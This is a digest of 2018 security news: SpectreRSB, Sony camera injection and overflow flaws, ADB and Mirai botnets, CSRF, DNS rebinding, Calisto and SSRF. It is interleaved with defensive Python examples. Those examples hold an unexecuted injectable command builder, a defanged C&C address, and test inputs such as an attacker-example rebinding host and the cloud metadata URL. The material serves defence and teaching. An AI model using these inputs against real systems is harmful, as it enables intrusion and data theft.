“rather than exploiting the branch predictor unit, SpectreRSB exploits the return stack buffer (RSB), a common predictor structure in modern CPUs used to predict return addresses.” reads the research paper.

“We show that both local attacks (within the same process such as Spectre 1) and attacks on SGX are possible by constructing proof of concept attacks”

The experts demonstrated that they could pollute the RSB to control the predicted return address and thus poison the CPU’s speculative execution.

The experts explained that the RSB is shared among hardware threads that execute on the same virtual processor, enabling inter-process, or even inter-VM, pollution of the RSB.

The academics proposed three attack scenarios that leverage the SpectreRSB attack to pollute the RSB and gain access to data they weren’t authorized to view.

In two attacks, the experts polluted the RSB to access data from other applications running on the same CPU. In the third attack they polluted the RSB to cause a misspeculation that exposes data outside an SGX compartment.

“an attack against an SGX compartment where a malicious OS pollutes the RSB to cause a misspeculation that exposes data outside an SGX compartment. This attack bypasses all software and microcode patches on our SGX machine” continues the paper.

Researchers said they reported the issue to Intel, but also to AMD and ARM. Researchers only tested the attack on Intel CPUs, but it is likely that both AMD and ARM processors are affected because they both use RSBs to predict return addresses.

According to the researchers, current Spectre patches are not able to mitigate the SpectreRSB attacks.

“Importantly, none of the known defenses including Retpoline and Intel’s microcode patches stop all SpectreRSB attacks,” wrote the experts.

“We believe that future system developers should be aware of this vulnerability and consider it in developing defenses against speculation attacks.”

The good news is that Intel already has a patch that stops this attack on some CPUs, but it wasn’t rolled out to all of its processors.

“In particular, on Core-i7 Skylake and newer processors (but not on Intel’s Xeon processor line), a patch called RSB refilling is used to address a vulnerability when the RSB underfills” continue the researchers.

“This defense interferes with SpectreRSB’s ability to launch attacks that switch into the kernel. We recommend that this patch should be used on all machines to protect against SpectreRSB.”

A spokesperson for Intel told El Reg that the company believes its existing mitigations do thwart SpectreRSB side-channel attacks:

“SpectreRSB is related to Branch Target Injection (CVE-2017-5715), and we expect that the exploits described in this paper are mitigated in the same manner. We have already published guidance for developers in the whitepaper, Speculative Execution Side Channel Mitigations. We are thankful for the ongoing work of the research community as we collectively work to help protect customers.”


Sony addresses remotely exploitable flaws in Sony IPELA E Network Cameras
23.7.2018 securityaffairs Exploit

Sony fixed 2 remotely exploitable flaws in Sony IPELA E Series Network Camera products that could be exploited to execute commands or arbitrary code.
Sony addressed two remotely exploitable flaws in Sony IPELA E Series Network Camera products that could be exploited to execute commands or arbitrary code on affected devices.

The first vulnerability, tracked as CVE-2018-3937, is a command injection issue that affects the measurementBitrateExec features implemented in the IPELA E Series Network Camera.

The vulnerability was reported by researchers Cory Duplantis and Claudio Bozzato from Cisco Talos. An attacker could execute arbitrary code by sending a specially crafted HTTP GET request to vulnerable devices.

“An exploitable command injection vulnerability exists in the measurementBitrateExec functionality of Sony IPELA E Series Network Camera. A specially crafted GET request can cause arbitrary commands to be executed. An attacker can send an HTTP request to trigger this vulnerability. Detailed vulnerability information can be found here.” wrote the researchers.

The experts explained that the devices fail to validate the server address while parsing the input measurement string. The attacker can provide any string as the server address, and it will be executed via system().

“While parsing the input measurement string, there isn’t a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address,” continues the experts.


The second issue, tracked as CVE-2018-3938, is a stack buffer overflow that resides in the 802dot1xclientcert.cgi functionality of the Sony IPELA E Series Camera products.

“An exploitable stack buffer overflow vulnerability exists in the “802dot1xclientcert.cgi” functionality of Sony IPELA E Series Camera. A specially crafted POST request can cause a stack buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability. Detailed vulnerability information can be found here.” wrote the researchers.

The vulnerability could be exploited by sending a specially crafted POST request.

“A specially crafted POST can cause a stack-based buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability,” continues the experts.

The 802dot1xclientcert.cgi component is “designed to handle everything related to certificate management for 802.1x.”

The system fails to check the length (strlen) of the incoming data before it is copied directly into a local buffer via memcpy. This means that an attacker can provide content that triggers the stack-based buffer overflow, which could allow the attacker to remotely execute commands on the affected device.

Both vulnerabilities affect Sony IPELA E series G5 firmware 1.87.00; the tech giant released an update last week to address them.
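The two defects Talos describes are a missing allow-list check on the server address before it reaches system(), and a missing length check before a memcpy. The following is an added example, not code from Sony or from the Talos advisory, showing the hardened form of both in Python: the address is validated against an IP-literal or host-name allow-list and then passed as its own argv element (no shell), and the upload is bounded before it is stored. The tool name `measure_bitrate`, the `-t` flag and the 4096-byte certificate limit are placeholders.

```python
import ipaddress
import re
import subprocess

# RFC 1123 style host name: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, at most 253 characters in total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_valid_server_address(value):
    """Allow-list check for the measurement server: an IP literal or a plain host name.
    Shell metacharacters, spaces and quotes can never pass this test."""
    if not isinstance(value, str) or not value:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None


def unsafe_command_line(server):
    """The weak pattern the advisory describes: the untrusted address is pasted into a
    command string that is then handed to system(). Returned as a string only, never run."""
    return "measure_bitrate -c " + server


def build_measurement_argv(server, seconds=5):
    """Hardened form: validate first, then pass the address as its own argv element so
    no shell ever interprets it. 'measure_bitrate' is a placeholder tool name."""
    if not is_valid_server_address(server):
        raise ValueError("server address rejected: %r" % (server,))
    seconds = int(seconds)
    if not 1 <= seconds <= 60:
        raise ValueError("duration out of range")
    return ["measure_bitrate", "-c", server, "-t", str(seconds)]


def run_measurement(server, seconds=5, runner=subprocess.run):
    """Execute the measurement without a shell (shell=False is the default, stated here
    for clarity); the runner is injectable so the function can be exercised offline."""
    argv = build_measurement_argv(server, seconds)
    return runner(argv, shell=False, capture_output=True, text=True, timeout=seconds + 10)


CERT_FIELD_MAX = 4096   # assumed upper bound for the PEM blob in the 802.1x upload


def accept_certificate_field(body, max_len=CERT_FIELD_MAX):
    """The length check the camera's CGI lacked: refuse an upload larger than the buffer
    it would be copied into instead of copying it blindly. True means it may be stored."""
    return isinstance(body, (bytes, bytearray)) and 0 < len(body) <= max_len
```

The allow-list is the important part: rejecting known-bad characters (`;`, backticks, `$(`) is fragile, whereas accepting only the two shapes a server address can legitimately take leaves nothing for a shell to interpret, and passing argv without a shell removes the interpreter entirely.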


Botnet Targets Open Ports on Android Devices
23.7.2018 securityweek BotNet

A wave of attacks is targeting Android devices with port 5555 open, likely in an attempt to ensnare them into a botnet, Trend Micro warns.

TCP port 5555 is designed to allow management of devices via Android Debug Bridge (ADB), an Android SDK feature that allows developers to easily communicate with devices and to run commands on them or fully control them.

The ADB port is meant to be disabled on commercial devices and to require initial USB connectivity to be enabled. Last month, however, security researcher Kevin Beaumont revealed that many devices ship with ADB enabled, which leaves them exposed to attacks.

Scanning attacks specifically targeting the ADB port have been seen since January. In early 2018, a worm leveraging a modified version of Mirai’s code was searching for devices with open port 5555 to spread for crypto-mining purposes.

Now, Trend Micro says a new exploit is targeting port 5555. The security firm has observed a spike in activity on July 9-10, when network traffic came mainly from China and the US, followed by a second wave on July 15, primarily involving Korea.

“From our analysis of the network packets, we determined that the malware spreads via scanned open ADB ports. It drops the stage 1 shell script via ADB connection to launch on the targeted system. This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary,” Trend Micro explains.

After infecting devices, the malware targets a series of processes for termination and launches its own child processes, one of which is responsible for spreading the malware as a worm. It also opens a connection to the command and control (C&C) server.

The payload also contains a header with a number of targets and IP packet types to be sent, which could suggest the malware was designed to launch distributed denial of service (DDoS) attacks: it can send UDP, TCP SYN, and TCP ACK packets (with a random payload of random length), UDP with a random payload tunneled through Generic Routing Encapsulation (GRE), and TCP SYN.

Trend Micro also discovered that the downloaded binaries connect to the C&C server at 95[.]215[.]62[.]169, which was found to be linked to the Mirai variant Satori.

“It’s reasonable to believe that the same author was behind this sample and Satori,” Trend's security researchers say.

The malware’s worm-like spreading capabilities could suggest other attacks might follow the recently observed spikes in activity, Trend Micro also notes. The security firm suggests the actor behind the malware might have been “testing the effectiveness of their tools and tactics to prepare for a more serious attack.”

An online search reveals over 48,000 IoT systems vulnerable to ADB exploitations, but not all of them might be exposed, as some are likely behind routers with Network Address Translation (NAT). Even so, misconfigurations might result in these devices becoming accessible from the Internet, turning them into easy targets for the malware.

“All multimedia devices, smart TVs, mobile phones, and other devices without additional protection are easy targets for this malware regardless of the user’s password strength,” Trend Micro concludes.
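Both the Mirai/Gafgyt campaigns described earlier and this ADB worm begin the same way: a source sweeps many hosts on a handful of management ports (telnet for Mirai-style bots, TCP 5555 for ADB). The detection logic below is an added example, not from Trend Micro or Palo Alto Networks; it runs over constructed flow records (5-tuples with TCP flags, as a NetFlow or Zeek export would give you) and answers two defender questions: which sources are sweeping, and which of our own devices actually answered on those ports and therefore need fixing first. Port set and thresholds are assumptions to tune per network.

```python
from collections import defaultdict

# Ports the two reports describe being swept: telnet for Mirai/Gafgyt, ADB over TCP (5555).
WATCHED_PORTS = {23, 2323, 5555}

# Constructed flow records (not real captures): src_ip, src_port, dst_ip, dst_port, tcp_flags
SAMPLE_FLOWS = [
    ("203.0.113.7", 40001, "192.0.2.10", 5555, "S"),
    ("203.0.113.7", 40002, "192.0.2.11", 5555, "S"),
    ("203.0.113.7", 40003, "192.0.2.12", 5555, "S"),
    ("203.0.113.7", 40004, "192.0.2.13", 5555, "S"),
    ("203.0.113.7", 40005, "192.0.2.14", 5555, "S"),
    ("192.0.2.12", 5555, "203.0.113.7", 40003, "SA"),   # only this device answered on ADB
    ("198.51.100.9", 51000, "192.0.2.20", 23, "S"),
    ("198.51.100.9", 51001, "192.0.2.21", 2323, "S"),
    ("192.0.2.30", 44000, "192.0.2.31", 443, "S"),        # ordinary HTTPS, must not alert
    ("192.0.2.31", 443, "192.0.2.30", 44000, "SA"),
]


def scan_sources(flows, ports=WATCHED_PORTS, min_targets=5):
    """Sources that sent bare SYNs to at least min_targets distinct hosts on watched ports.
    Returns {src_ip: sorted list of swept destination IPs}."""
    targets = defaultdict(set)
    for src, _sport, dst, dport, flags in flows:
        if dport in ports and flags == "S":
            targets[src].add(dst)
    return {src: sorted(hosts) for src, hosts in targets.items() if len(hosts) >= min_targets}


def reachable_services(flows, ports=WATCHED_PORTS):
    """Devices that answered SYN-ACK from a watched port: the service is really reachable
    from the scanning source, so these are the hosts to remediate first.
    Returns {device_ip: sorted list of answering ports}."""
    found = defaultdict(set)
    for src, sport, _dst, _dport, flags in flows:
        if sport in ports and flags == "SA":
            found[src].add(sport)
    return {host: sorted(p) for host, p in found.items()}


if __name__ == "__main__":
    print("sweeping sources:", scan_sources(SAMPLE_FLOWS))
    print("devices answering on watched ports:", reachable_services(SAMPLE_FLOWS))
```

The SYN-ACK view is what turns a noisy scan alert into an actionable list: most swept addresses never answer, and a device that does is one with ADB or telnet genuinely exposed, which is the condition the article says turns a device into an easy target.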


Microsoft Addresses Serious Vulnerability in Translator Hub
23.7.2018 securityweek Vulnerability

A serious vulnerability in the Microsoft Translator Hub could be exploited to delete any or all of the 13000+ projects hosted by the service, a security researcher has discovered.

The service allows interested parties to build their own machine translation system tailored for their organizational needs and then use it, via the Microsoft Translator Text API, in applications, websites, with Microsoft Document Translator, and more.

According to Microsoft, the Translator Hub allows enterprises to build translation systems, and allows governments, universities and language preservation communities to “build translation systems between any pair of languages, including languages not yet supported by Microsoft Translator, and reduce communication barriers.”

While hunting for vulnerabilities on the Hub, security researcher Haider Mahmood discovered that the HTTP request for removing a project contained the “projectid” parameter, which is the ID of the individual project in the database.

Mahmood also discovered that the request had no Cross-Site Request Forgery (CSRF) protection. This means that an attacker could exploit the CSRF vulnerability to impersonate a legitimate, logged-in user and perform actions on their behalf.

An attack scenario, he says, would require an attacker to know the ProjectID number of a logged-in victim. They could then include a URL in a page that issues a remove command and, as soon as the victim visits that page, the request would be sent from their browser and the project removed.

Further analysis of the issue revealed an Indirect Object Reference vulnerability, which could essentially allow an attacker to set any ProjectID in the HTTP project removal request and delete any of the projects in Microsoft Translator Hub.

In fact, by iterating through project IDs starting from 0 to 13000, an attacker could delete all projects from the database, the security researcher reveals.

Mahmood reported the vulnerability to Microsoft in late February 2018. The company addressed the issue within the next two weeks, and also offered the researcher an acknowledgement on their Online Researcher Acknowledgement page.
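The two weaknesses combine because the removal handler trusted the session cookie alone (CSRF) and then trusted the client-supplied project id alone (the object-reference flaw). The following is an added example, not Microsoft's code, showing a removal handler that closes both gaps with a session-bound CSRF token and an ownership check; the in-memory `ProjectService`, its user names and the project id 1234 are constructed for the demonstration.

```python
import hmac
import secrets


class ProjectService:
    """Constructed in-memory stand-in for a project store with sessions and owners."""

    def __init__(self):
        self.projects = {}      # project_id -> owner user name
        self.sessions = {}      # session cookie -> user name
        self.csrf_tokens = {}   # session cookie -> CSRF token bound to that session

    def login(self, username):
        """Return a session cookie; a fresh CSRF token is bound to the session."""
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = username
        self.csrf_tokens[sid] = secrets.token_urlsafe(32)
        return sid

    def csrf_token_for(self, sid):
        """The token the server renders into its own pages (hidden field or request header).
        A third-party page cannot read it, which is what makes the check work."""
        return self.csrf_tokens[sid]

    def create_project(self, sid, project_id):
        self.projects[project_id] = self.sessions[sid]

    def remove_project(self, sid, project_id, csrf_token):
        """Handle a project-removal request: session, then CSRF token, then ownership."""
        user = self.sessions.get(sid)
        if user is None:
            return "unauthenticated"
        expected = self.csrf_tokens.get(sid)
        # Cross-site case: the browser attached the cookie, but the token could not travel.
        if not csrf_token or expected is None or not hmac.compare_digest(expected, csrf_token):
            return "csrf_rejected"
        # Authorisation: resolve the project by (id, caller) and never by id alone. A project
        # that exists but belongs to someone else is answered exactly like a missing one,
        # so the handler cannot be used to enumerate ids.
        if self.projects.get(project_id) != user:
            return "not_found"
        del self.projects[project_id]
        return "deleted"


def scenario():
    """Three requests against the hardened handler; returns their outcomes in order."""
    svc = ProjectService()
    victim = svc.login("victim")
    attacker = svc.login("attacker")
    svc.create_project(victim, 1234)
    results = []
    # 1. Forged request from a page the victim visited: cookie present, token absent.
    results.append(svc.remove_project(victim, 1234, csrf_token=None))
    # 2. Attacker with their own valid token names the victim's project id.
    results.append(svc.remove_project(attacker, 1234, csrf_token=svc.csrf_token_for(attacker)))
    # 3. The owner, with the token rendered into their own page.
    results.append(svc.remove_project(victim, 1234, csrf_token=svc.csrf_token_for(victim)))
    return results
```

Binding the token to the session (rather than issuing one global token) and comparing it with `hmac.compare_digest` are the two details that are easy to get wrong; the ownership lookup is what stops the iteration over ids 0 to 13000 that the researcher describes.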


State-Actors Likely Behind Singapore Cyberattack: Experts
23.7.2018 securityweek Cyber

State-actors were likely behind Singapore's biggest ever cyberattack to date, security experts say, citing the scale and sophistication of the hack which hit medical data of about a quarter of the population.

The city-state announced Friday that hackers had broken into a government database and stolen the health records of 1.5 million Singaporeans, including Prime Minister Lee Hsien Loong who was specifically targeted in the "unprecedented" attack.

Singapore's health minister said the strike was "a deliberate, targeted, and well-planned cyberattack and not the work of casual hackers or criminal gangs".

While officials refused to comment on the identity of the hackers citing "operational security", experts told AFP that the complexity of the attack and its focus on high-profile targets like the prime minister pointed to the hand of a state-actor.

"A cyber espionage threat actor could leverage disclosure of sensitive health information... to coerce an individual in (a) position of interest to conduct espionage" on its behalf, said Eric Hoh, Asia-Pacific president of cybersecurity firm FireEye.

Hoh told national broadcaster Channel NewsAsia that the attack was an "advanced persistent threat".

"The nature of such attacks are that they are conducted by nation states using very advanced tools," he said.

"They tend to be well resourced, well-funded and highly sophisticated."

Russia, which is accused of meddling in the US presidential election, as well as China, Iran and North Korea are believed to have the capability to carry out such attacks.

Analysts, however, would not be drawn into speculation on who might be behind the hack or why Singapore was targeted.

The attack started two weeks after the wealthy city-state hosted the historic summit between US President Donald Trump and North Korean leader Kim Jong Un.

Jeff Middleton, chief executive of cybersecurity consultancy Lantium, said healthcare data is of particular interest to hackers because it can be used to blackmail people in positions of power.

"A lot of information about a person's health can be gleaned from the medications that they take," Middleton told AFP Saturday.

"Any non-public health information could be used for extortion. Russian spy services have a long history of doing this."

Medical information, like personal data, can also be easily monetised on criminal forums, said Sanjay Aurora, Asia-Pacific managing director of Darktrace.

"Beyond making a quick buck, a more sinister reason to attack would be to cause widespread disruption and systemic damage to the healthcare service -- as a fundamental part of critical infrastructure -- or to undermine trust in a nation's competency to keep personal data safe," he told AFP.

- Hyper-connected -

Today, cybercriminals are targeting more than just individuals or banks, said Shahnawaz Backer, regional security specialist at F5 Networks.

"Government services, from healthcare to education, are targets that are just as likely, as evidenced by the recent attacks in Singapore," Backer said.

"As Singapore embraces the digital revolution, security breaches are bound to happen. Our growing digital footprint is growing every day, and enterprises need to take strict measures to safeguard and protect their data."

Wealthy Singapore is hyper-connected and on a drive to digitise government records and essential services, including medical records which public hospitals and clinics can share via a centralised database.

But authorities have put the brakes on these plans while they investigate the breach. A former judge will head an inquiry looking into the hack.

Singapore officials have cautioned against jumping to conclusions about the attackers.

"With regard to the prime minister's data and why he was targeted, I would say that it's perhaps best not to speculate what the attacker had in mind," said David Koh, head of Singapore's Cyber Security Agency.

The hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The government says it fends off thousands of cyberattacks every day and has long warned of breaches by actors as varied as high-school students in their bedrooms to nation-states.

Earlier this month, US intelligence chief Dan Coats described Russia, China, Iran and North Korea as the "worst offenders" when it came to attacks on American "digital infrastructure".


Half a Billion Enterprise Devices Exposed by DNS Rebinding
23.7.2018 securityweek Hacking

Nearly half a billion devices used by enterprises are exposed to cyberattacks by DNS rebinding, according to a study conducted by IoT security firm Armis.

DNS rebinding, an attack method that has been known for more than a decade, allows a remote hacker to bypass the targeted entity’s network firewall and abuse their web browser to directly communicate with devices on the local network and exploit any vulnerabilities they may have. Getting the target to access a malicious page or view a malicious advertisement is often enough to conduct an attack that can lead to theft of sensitive information and taking control of vulnerable devices.

Google Project Zero researcher Tavis Ormandy revealed a few months ago that DNS rebinding could be used to exploit critical flaws in BitTorrent’s uTorrent application and the Transmission BitTorrent client.

More recently, researcher Brannon Dorsey showed how malicious actors could exploit vulnerabilities in Google Home and Chromecast devices, Roku TVs, Sonos Wi-Fi speakers, routers, and smart thermostats via DNS rebinding.

Armis, the firm that discovered the Bluetooth flaws dubbed BlueBorne, conducted its own research on the impact of DNS rebinding on enterprises.

The company estimates that there are 496 million enterprise devices worldwide that are exposed due to DNS rebinding. This includes 165 million printers, 160 million IP cameras, 124 million IP phones, 28 million smart TVs, 14 million switches and routers, and 5 million media players.

Number of devices vulnerable to DNS rebinding attacks

“Because of the widespread use of the types of devices listed above within enterprises, Armis can say that nearly all enterprises are susceptible to DNS rebinding attacks,” Armis said.

As an example of vulnerabilities that can be exploited as a result of DNS rebinding, the company highlighted the flaws patched this month by Cisco in its IP phones. Armis also pointed to the critical security holes discovered recently in Axis and Foscam cameras.

As for printers, researchers noted, “Unfortunately, printers are one of the least managed, most poorly configured devices in the enterprise. Aside from adjusting basic network configurations, enterprises typically deploy printers with default settings, making them an ideal target for a DNS rebinding attack.”

In an attack scenario described by Armis, the attacker simply needs to trick the targeted user into visiting a specially crafted website which hosts JavaScript code that will be executed in the victim’s browser. The JavaScript code instructs the browser to scan local IP addresses in search of vulnerable devices.

Once vulnerable systems are identified, the attacker can use DNS rebinding to send arbitrary commands (e.g. log into the web server) directly to the IP address of the compromised IoT device. The attacker can also establish an outbound connection to the C&C server and chances are that none of these communications will be detected or blocked by security products.

Since DNS rebinding is possible due to how DNS and web browsers work, Armis believes the best way for enterprises to protect their networks against attacks is to monitor all devices for signs of a breach, perform a risk analysis of IoT devices to determine which systems are vulnerable, and ensure that the devices are secure, including by applying software patches and disabling unnecessary services.
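DNS rebinding works because the browser's same-origin policy follows the host name while the attacker changes the address behind it, so the request reaches the device at its LAN address carrying the attacker's domain in the Host header. Two checks break that chain, and the following is an added example of both (not Armis's code): a Host-header check a device's embedded web server can apply, and a resolver-side filter that drops answers mapping an outside name to a private, loopback or link-local address (the behaviour dnsmasq offers as `--stop-dns-rebind`). The device addresses, the `.home.arpa` trusted suffix and the sample answers are constructed.

```python
import ipaddress


def _host_without_port(host_header):
    """'192.168.1.20:80' -> '192.168.1.20', '[fe80::1]:80' -> 'fe80::1'."""
    h = host_header.strip()
    if h.startswith("[") and "]" in h:
        return h[1:h.index("]")]
    return h.split(":", 1)[0]


def host_header_allowed(host_header, own_addresses, own_names=()):
    """Check for the device's embedded web server: serve a request only when Host names
    one of the device's own addresses or configured names. A rebound request arrives
    with the attacker's domain in Host and is refused before any handler runs."""
    host = _host_without_port(host_header).lower()
    allowed = {a.lower() for a in own_addresses} | {n.lower() for n in own_names}
    return host in allowed


def filter_dns_answers(qname, answers, trusted_suffixes=(".home.arpa",)):
    """Resolver-side check: drop A/AAAA answers that map an outside name to a private,
    loopback, link-local or unspecified address. Names under trusted_suffixes (the
    local zone) are exempt, because those legitimately resolve to LAN addresses."""
    name = qname.rstrip(".").lower()
    if any(name.endswith(s) for s in trusted_suffixes):
        return list(answers)
    kept = []
    for answer in answers:
        ip = ipaddress.ip_address(answer)
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_unspecified:
            continue   # a public name must not point into the LAN
        kept.append(answer)
    return kept


if __name__ == "__main__":
    # Constructed examples: a printer at 192.168.1.20 and a rebinding answer for an outside name.
    print(host_header_allowed("192.168.1.20:80", ["192.168.1.20"]))            # True
    print(host_header_allowed("rebind.attacker.example", ["192.168.1.20"]))    # False
    print(filter_dns_answers("rebind.attacker.example.", ["192.168.1.20", "93.184.216.34"]))
```

The Host check is the one a device vendor can ship without depending on the network, which matters for the printers and cameras the study counts; the resolver filter protects every device behind it, including the ones that will never be patched, at the cost of needing an explicit local zone for names that are meant to resolve to LAN addresses.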


Calisto macOS Backdoor Remained Undetected for Two Years
23.7.2018 securityweek Apple

A recently discovered backdoor targeting macOS systems remained undetected for at least two years, according to security firm Kaspersky Lab.

Dubbed Calisto, the malware was first uploaded to VirusTotal in 2016, likely the same year it was created, but it remained undetected by anti-virus solutions until May 2018, Kaspersky's security researchers say.

The backdoor is being distributed as an unsigned DMG image that masquerades as Intego’s Internet Security X9 for Apple's macOS. A comparison with the legitimate application shows that the threat looks fairly convincing, being likely to trick users, especially those who haven’t encountered the application before.

When launched, the malware displays a fake license agreement that differs only slightly compared to Intego’s legitimate agreement.

Next, Calisto asks for the user login and password but, as soon as the user provides the credentials, it hangs and displays an error message, informing the victim they should download a new installation package from Intego’s official site.

On machines with SIP (System Integrity Protection) enabled, an error occurs when the malware attempts to modify system files and it crashes. Apple introduced SIP in 2015 to protect critical system files from being modified, and it appears that the malware developers didn’t take that into account.

The Trojan uses a hidden directory named .calisto to store keychain storage data, data extracted from the user login/password window, network connection information, and Google Chrome data (history, bookmarks, and cookies).

If SIP is disabled, the malware copies itself to the /System/Library/ folder, sets itself to launch automatically on startup, unmounts and uninstalls its DMG image, adds itself to Accessibility, enables remote access to the system, and harvests additional information about the system and sends all data to the command and control (C&C) server.

The Trojan also includes some unfinished and unused functionality, such as the loading/unloading of kernel extensions for handling USB devices, data theft from user directories, and self-destruction (together with the OS).

Some of Calisto’s characteristics, Kaspersky says, bring the malware close to the Backdoor.OSX.Proton family. The threat poses as a well-known antivirus (Proton was disguised as a Symantec product), its code contains the line “com.proton.calisto.plist,” and it can steal a lot of personal data from the system, including the contents of Keychain.

The Proton remote access Trojan was discovered in 2017. It was being advertised as “a professional FUD surveillance and control solution” that could provide complete remote control of infected machines and could steal anything from credit card information to keystrokes and screenshots.

“The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton,” Kaspersky concludes.


SSRF Flaw Exposed Information From Google's Internal Network
23.7.2018 securityweek Vulnerability

A researcher has earned a significant bug bounty from Google after finding a serious server-side request forgery (SSRF) vulnerability that exposed information from the tech giant’s internal network.

The flaw was discovered by security engineer Enguerran Gillier in May and it took Google less than 48 hours to implement a patch. The expert earned $13,337 for his findings, which is the highest reward offered by the company for unrestricted file access issues.

Gillier identified the security hole after previously reporting a cross-site scripting (XSS) vulnerability in Google Caja, a tool that makes it safe to embed third party HTML, JavaScript and CSS code in a website.

He checked if the XSS attack he had discovered worked on Google Sites as well, which at the time used an unpatched version of Caja. After he failed to reproduce the XSS vulnerability, the expert tested for SSRF and discovered that the Google Sites Caja server was only fetching resources from Google domains.

The researcher bypassed this limitation by hosting a JavaScript file on Google Cloud services. The SSRF test resulted in a 1 Mb reply from the server, containing various pieces of private information from Google’s internal network.

Gillier reported his findings to Google, but continued conducting tests until the company rolled out a fix. While he did not manage to achieve unrestricted file access or remote code execution, the researcher did come across some interesting information from Google’s Borg, a datacenter management system that runs the company’s services.

A Borg cell includes a set of machines, a central controller named the Borgmaster, and an agent process called Borglet that runs on each machine.

Gillier made three test requests while Google was working on patching the issue and each of them led to the server responding with the status monitoring page of a Borglet. This provided the researcher various types of information, including what type of hardware powered the servers, performance data, and information on the tasks (jobs) submitted by users to Borg.

The researcher has made public some of the information he discovered. While none of the disclosed details appear to be particularly sensitive, some have questioned if he was allowed to make the information public and if he made the right choice in doing so.

“It’s not easy to determine the impact of an SSRF because it really depends on what’s in the internal network,” Gillier explained in a blog post. “Google tends to keep most of its infrastructure available internally and uses a lot of web endpoints, which means that in case of a SSRF, an attacker could potentially access hundreds if not thousands of internal web applications. On the other hand, Google heavily relies on authentication to access resources which limits the impact of a SSRF.”

“[Google] explained that while most internal resources would require authentication, they have seen in the past dev or debug handlers giving access to more than just info leaks, so they decided to reward for the maximum potential impact,” he added.
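The Caja server's mistake was an allow-list on the host name (Google domains) that still let the fetch reach internal addresses. The usual server-side defence checks the addresses a URL actually resolves to, not its name, and then pins the connection to the checked address. The following is an added example of that check (not Google's code); the resolver table and the host names in it are constructed so the example runs offline, and in a real service `resolve` would be the system resolver.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed resolver table so the example runs offline. A deployment would use the
# system resolver and pass every returned address through the same checks.
FAKE_DNS = {
    "public.example": ["93.184.216.34"],
    "intranet.corp.example": ["10.1.2.3"],
    "mixed.example": ["93.184.216.35", "169.254.169.254"],
}


def fake_resolve(hostname):
    return FAKE_DNS.get(hostname.lower(), [])


def check_outbound_url(url, resolve=fake_resolve):
    """Decide whether a server-side fetch of url may proceed.
    Returns (allowed, reason, pinned_ip). When allowed, the caller should connect to
    pinned_ip and send the original host name in the Host/SNI, so that a second lookup
    between this check and the connect cannot be answered with an internal address."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed", None
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed", None
    host = parts.hostname
    if not host:
        return False, "missing host", None
    try:
        addresses = [str(ipaddress.ip_address(host))]   # IP literal, no lookup needed
    except ValueError:
        addresses = resolve(host)
    if not addresses:
        return False, "host does not resolve", None
    # Every address must be globally routable: one private answer among several is
    # enough for an attacker-controlled name, so reject the whole set.
    for addr in addresses:
        if not ipaddress.ip_address(addr).is_global:
            return False, "resolves to non-global address " + addr, None
    return True, "ok", addresses[0]


if __name__ == "__main__":
    for candidate in ("https://public.example/report",
                      "http://intranet.corp.example/",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://mixed.example/"):
        print(candidate, "->", check_outbound_url(candidate))
```

`is_global` from the standard library rejects RFC 1918 space, loopback, link-local (including the 169.254.169.254 metadata address) and the IANA special-purpose blocks in one test, which is simpler and less error-prone than maintaining a deny-list of prefixes; the pinned-address rule in the docstring is what closes the rebinding window Gillier's own write-up alludes to when he describes fetches of hosted resources.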


Mirai, Gafgyt IoT Botnet Attacks Intensify
23.7.2018 securityweek BotNet

Security researchers are warning of a new wave of attacks associated with two infamous Internet of Things (IoT) botnets: Mirai and Gafgyt.

Behind some of the largest distributed denial of service (DDoS) attacks in history, Mirai had its source code leaked in October 2016, soon after it first emerged. Numerous Mirai variants have spawned from its source code since, the most recent of which include Wicked and Omni.

Also known as Bashlite, Lizkebab, and Torlus, Gafgyt was first spotted in 2014 and had its source code leaked in early 2015. By the summer of 2016, the number of ensnared devices peaked at over 1 million, though they were spread over multiple botnets.

Three recent infection campaigns associated with these two botnets have revealed an increased interest from malware authors towards exploiting vulnerabilities in IoT devices, rather than weak credentials.

The attacks also appear to suggest once again that there could be a connection between the two botnets, something that initial reports on Mirai two years ago were detailing as well.

The first campaign is associated with Omni, one of the latest evolutions of Mirai, and stands out in the crowd because of its exclusive use of exploits, Palo Alto Networks reveals.

The botnet uses a broad range of exploits: two flaws in Dasan GPON routers that were made public in May (which have been targeted by botnets ever since), a Huawei router security bug, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a JAWS Webserver command execution, and a remote code execution in CCTVs and DVRs from over 70 vendors.

The campaign also shows the use of two different encryption schemes, doesn’t attempt to propagate via credential brute-forcing, and prevents further infection of compromised devices through dropping packets received on certain ports using iptables.

The IP the malware was using for serving payloads and as a command and control (C&C) server was also observed being used by some Gafgyt samples that emerged around the same time.

The second campaign was using the same exploits as the first series of attacks, but also attempted credential brute force attacks, some of which are default credentials in Camtron IP cameras and Control4 and ADC FlexWave Prism devices.

The researchers also noticed that some of the samples included some brand new DDoS methods and that some of the newest samples completely removed the exploits and went back to exclusively attempting brute-force compromise.

The third campaign, the security researchers reveal, was no longer attempting to infect devices with a Mirai variant, but was delivering malware built on the Gafgyt source code that also includes a layer-7 DDoS-targeting function (SendHTTPCloudflare).

